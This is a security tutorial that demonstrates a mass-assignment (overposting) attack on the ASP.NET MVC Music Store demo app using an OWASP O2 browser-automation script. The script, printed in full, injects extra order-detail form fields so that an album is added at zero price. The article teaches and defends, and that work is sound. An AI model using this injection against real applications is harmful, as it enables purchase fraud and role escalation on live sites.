Exploiting Microsoft MVC vulnerabilities using OWASP O2 Platform

• Download source code - 1.3 KB

Introduction

The OWASP O2 platform represents a new paradigm for how to perform, document and distribute Web Application security reviews. O2 is designed to Automate Security Consultants Knowledge and Workflows and to allow non-security experts to access and consume Security Knowledge. O2 can also be a very powerful prototyping and fast-development tool for .NET (see VisualStudio Extension  C# REPL - O2 Platform).

In this article we'll show you how to use the O2 platform to exploit the overposting vulnerability on top of Microsoft MVC.

Background

During the last years we have seen how the industry is being using Web technologies to simplify our lives, providing an easy way to support business, education, medicine and communications. This behavior is not surprising because the Web is the biggest system that exist and because producers and consumers have created a strong ecosystem around it. The Web has evolved. The cutting edge Web techniques are focused on design and user experience trying to provide a better approach to end users and not forgetting the target functionality.

But it is important to be compliant with the way the Web works and the industry knows it. Produces have created tools over the years to take advantage of the architecture of the Web. An example of a standard compliant technology is the Model-View-Controller architecture which is currently one of the favorite tools to build rapid Web Applications.

The industry has broadly adopting MVC (Model View Controller) architecture to build applications on top of the Web for several reasons, including an approach to build applications in the way the Web works (taking advantage of the core principles of the Web) and not against it. But as all the technologies that rely on the Web, it has vulnerabilities that might be exploited by attackers.

An example of this vulnerability is mass assignments (also known as over posting or Model Binding). Model Binding is the process or mechanism to create objects (.NET objects if your Framework is Microsoft .NET) using the data sent by the browser in a HTTP Request. It’s important to point that this is an old vulnerability on the MVC architecture (including other frameworks outside of Microsoft world like Ruby on Rails and Spring MVC); few montahs go GitHub was compromised because a user took advantage of this vulnerability.

An overview to mass assignments vulnerabilities

In MVC framework, mass assignments is a mechanism that allow us to update our models with data coming in a request in HTTP form fields, following the HTTP specification, this can be achieved using HTTP verbs or methods i.e. HTTP POST. As the data that needs to be update comes in a collection of form fields, a user could send a request and modify other fields in the model that you didn’t want to be updated. In this architecture, a Model contains or represent the data the user works with, for instance models might contain business data or the rules and operations to manipulate that data.

Depending on the models you create, there might be sensitive data that you would not like to be modified, for instance sometimes the models have foreign relations to other models (i.e. a shopping cart with orders and details) that might be indirectly modified or the isAdmin property to differentiate roles and responsibilities within you application. The vulnerability is exploited when a malicious user modify model’s fields that you don’t want to.

The value added of OWASP O2 Platform to identify and exploit this vulnerability

In order to demonstrate how this vulnerability works, we will use an O2 script and the target Web Site is a real Microsoft MVC application: Music Store. This excellent demo application can be downloaded from CodePlex directly from this URL http://mvcmusicstore.codeplex.com. The below image shows this Web application up and running.

ASP.NET MVC Music Store is basically an online store or shopping cart where you can create an account and buy the albums of your favorite artist.The below image shows the albums by category.

This is an overview of the Music Store Web Site, now we have created an Internet Explorer automation script to exploit the mass assignment vulnerability.

The following O2 script allows us to automate the registration process and the check out process. Since this application works as a Master-detail approach with order and details, then you can imagine that the order details contains the album information and all information related to the album including the prices, quantity and so on.

The mass assignment vulnerability is exploited when our O2 script, using HTTP form fields, injects a new order into the order details so we are buying and album but injecting a second album for free.

In order to start we need to have OWASP O2 Platform up and running, the latest version of OWASP O2 is available at http://tiny.cc/O2Platform. At the time of writting this article (October 2012) the latest version is V4.3 From this particular link we can get the stand-alone version of OWASP O2.

Once you run it, you’ll see the below screen. This is our start up control panel, because we can select what kind of script to use based on your needs. There are several options and flavors of built editors to make our work easier.

From the Write Script dropdown list please select IE Script, this editor allow us to write automation scripts in a specific Web Site or Web Applications. This editor is very powerful because we manipulate the DOM (Document Object Model) of the page easily allowing changing the behavior or the html fields at anytime. The below image show what kind of script we need to select.

By default OWASP O2 IE automation editor generate a very useful template creating a really easy test case performing a look up at google. Keep in mind that your browser globalization needs to be compliant with your language, for instance if your browser is set up to display the content in Spanish,then probably the name of the components in the DOM will be different.

Using the IE Script editor we are going to use the below O2 Script to automate the shopping cart workflow:

var ie = panel.clear().add_IE().silent(true);
var site = "http://localhost:26641";

Action<string,string,string> register =
    (username, password,email)=>{
                                    ie.open(site + "/Account/Register");
                                    ie.field("UserName").value(username);
                                    ie.field("Email").value(email);
                                    ie.field("Password").value(password);
                                    ie.field("ConfirmPassword").value(password);
                                    ie.button("Register").click();
                               };

Action loginAsTestUser =
    ()=>{
            var user1_name = "test_user".add_RandomLetters(5);
            var user1_email = "test@testuser.com";
            var user1_pwd = "a pwd".add_RandomLetters(10);
            register(user1_name, user1_pwd, user1_email);
        };

Action selectTestProductAndCheckout =
    ()=>{
            ie.link("Rock").scrollIntoView().flash().click();
            //Selection Led Zeppeling I album
            ie.link(" Led Zeppelin I ").scrollIntoView().flash().click();
            ie.link("Add to cart").flash().click();
            ie.link("Checkout >>").flash().click();
        };

Action populateSubmitOrder =
    ()=> {
            var Address = "O2 User Address";
            var City = "O2 User City";
            var Country = "O2 User Country";
            var Email = "O2UserEmail@email.com";
            var FirstName = "O2 User FirstName";
            var LastName = "O2 User LastName";
            var Phone = "O2 User Phone";
            var PostalCode = "AAA BBB";
            var State = "O2 User State";
            var PromoCode = "FREE";   // currently hard coded promotional code
            ie.field("Address").value(Address);
            ie.field("City").value(City);
            ie.field("Country").value(Country);
            ie.field("Email").value(Email);
            ie.field("FirstName").value(FirstName);
            ie.field("LastName").value(LastName);
            ie.field("Phone").value(Phone);
            ie.field("PostalCode").value(PostalCode);
            ie.field("PromoCode").value(PromoCode);
            ie.field("State").value(State);
        };

Action submitOrder =
    ()=> {
            ie.button("Submit Order").click();
            };

Action<string,string> injectField =
    (fieldName, value)=>{
                        ie.field("FirstName")
                          .injectHtml_afterEnd(@"{0}:<input type=""text"" name=""{0}"" value=""{1}"" />"
                                                   .format(fieldName,value));
                };

Action runExploit_1 = 
    ()=>{
            loginAsTestUser();
            selectTestProductAndCheckout();
            populateSubmitOrder();
            /*the following simulates adding this to the POST request following URI Convention:
                OrderDetails[0].OrderDetailId=1&
                OrderDetails[0].OrderId=1&
                OrderDetails[0].AlbumId=1&
                OrderDetails[0].Quantity=1&
                OrderDetails[0].UnitPrice=5*/
            injectField("OrderDetails[0].OrderDetailId","1");
            injectField("OrderDetails[0].OrderId","1");
            injectField("OrderDetails[0].AlbumId","1");
            injectField("OrderDetails[0].Quantity","1");
            injectField("OrderDetails[0].UnitPrice","0");
            submitOrder();
        };

runExploit_1();

return "done";

//O2File:WatiN_IE_ExtensionMethods.cs
//O2Ref:WatiN.Core.1x.dll

Now we capture the local traffic to see how our IE script injected a second album in our order details, showing how the mass assignment was exploited. By looking at the HTTP Post form fields we realize that our injected parameters were sent. Please look at the image below:

Once our script has been successfully executed, it’s a good time to take a look at the database to confirm that a second album was injected dynamically in the request as a part of the HTTP POST form fields.

The below screen represent a single SQL query in the database to retrieve the information we are looking for. An in fact, there is a second album in the database that was never selected by the user but was injected which means that we were able to exploit the auto binding vulnerability on top of Microsoft MVC 3. See the results in the below grid.

But, How was this possible?

As a part of the MVC architecture and the HTTP specification itself, HTTP POST verb is used to create new resources, therefore in MVC architecture we have a collection of HTTP form fields. As we described earlier, the models are one of the most important components of this architecture because it represents business and real life objects.

In the following image we will see that by injecting the HTTP POST form fields for another album using our OWASP O2 script, the collection of fields will contain the injected album and therefore it will create a new entry in our database. This is a good example that shows how the Mass assignments vulnerabilities work is the MVC world. It’s just after an attacker discovers the models of your application when this attack might be performed, in this case our script explicitly add a new album to the order details but we also would change the security level or role of the current user in this same way.

It’s also surprising that Mass assignment vulnerability is not a new topic. It has been discovered long time ago but the most recent frameworks including Microsoft MVC and Spring MVC are vulnerable to this attack. Following this approach any developer might leave the door open in this topic because it is easy to make this mistake.

Final thoughts

In this article we wanted to show how to exploit the mass assignment vulnerabilities on top of Microsoft MVC framework. This use case is very important considering that the industry is adopting this framework to build the most efficient and standard compliant applications. We also tried to illustrate how easy is to leave the door open in our applications and allow attackers to change the behavior of our products.

One more time we see the value added of using OWASP O2 Platform during the life cycle of the software development to help developers to find, detect and correct the security issues created during the software development cycle. It’s important to clarify that each platform has created some mechanisms to avoid the mass assignments vulnerabilities but it also requires that you manually decided what properties to protect during the actualization of your models. Since this is a manual process it is just necessary that someone ignore the best practices and we will get the vulnerability materialized in our applications.

Using OWASP O2 Platform we can see two potential and powerful functionalities, the first one is the IE automation process using acceding directly to the HTML tags and the second one is using this automation mechanism to rely on application security.

We hope you find it useful!

Further references

• OWASP O2 main blog http://o2platform.wordpress.com
• Dinis Cruz's blog http://diniscruz.blogspot.com
• Book Pro ASP.NET MVC 3 Framework THIRD EDITION, Freeman Adam and Sanderson Steven, Apress.
• Vulnerabilities on top of Spring MVC framework http://www.springsource.com/security/spring-mvc